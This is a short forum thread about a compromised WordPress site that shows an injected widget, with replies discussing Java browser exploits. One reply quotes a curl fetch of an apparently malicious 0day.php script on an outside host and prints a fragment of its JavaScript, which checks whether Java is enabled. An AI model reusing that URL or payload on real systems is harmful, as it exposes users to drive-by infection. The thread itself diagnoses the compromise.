wordpress widget injection

Sudenly i have this widget in my wordpress site.

5 Replies

Looks like your wordpress installation has been compromised so a reinstall is in order.

And, if you have your Java enabled in-browser, so are you.

>> And, if you have your Java enabled in-browser, so are you.

What if he applied the fix?

What if he doesn't run Java 7 anyways and didn't need the fix?

Why do you worry about one Java bug when Flash, Windows and Linux itself has zero day bugs on occasion too?

What if he did have Java 7 and didn't apply the fix and when he got a dialog to run something he told it no?

Perhaps we should get rid of all Java, all Flash, all HTML5, WebGL, JavaScript,

PHP, Wordpress, etc.?


rtucker@witte:~$ curl http://asaunirg.com.br/js/0day.php
            if(navigator.javaEnabled()) {
                document.write(' ');

It may be short-sighted, sure, but I don't worry too much about the possibility of someone shooting me with a handgun when they're running towards me with an ax.



I don't worry too much about the possibility of someone shooting me with a handgun when they're running towards me with an ax.

I like it :D


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